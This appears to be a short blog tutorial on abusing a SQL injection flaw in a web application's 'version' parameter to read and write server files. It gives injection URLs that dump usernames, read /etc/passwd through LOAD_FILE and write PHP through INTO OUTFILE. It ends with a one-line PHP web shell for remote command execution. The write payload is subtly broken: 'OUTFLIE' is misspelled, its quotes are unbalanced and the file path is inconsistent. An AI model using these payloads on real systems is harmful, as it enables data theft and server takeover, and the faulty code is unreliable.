File Write via SQL
Hi folks,
you probably know SQL injections. SQL injections provide a lot of fun concerning database manipulation. But it is also a great way to read and write files.
Consider the website example.com
. In our example, the application provides a version parameter that is susceptible to SQL injections. As consequence, an attacker is enabled to do database voodoo like
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,username FROM users--
This should return a list of user names that are stored in the table users
. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.
Reading Files
The following listing is slightly edited to give us the content of the file /etc/passwd
. This is done via LOAD_FILE. Note, this only works with files readable for the database user.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--
Writing Files
After reading files, let's go ahead writing them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.
http://example.com/index.php?version=1.0' UNION ALL SELECT NULL,NULL,"<?php echo "hello world"; ?> INTO OUTFLIE "/var/www/vhosts/example.com/foobar.php"--
The fun part is, that our php statement is written into /var/vhosts/example.com/foobar.php
. Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?>
into a file readable for the web server. In case of success, the attacker has a nice remote shell by using http://example.com/foobar.php?cmd=ls -l
.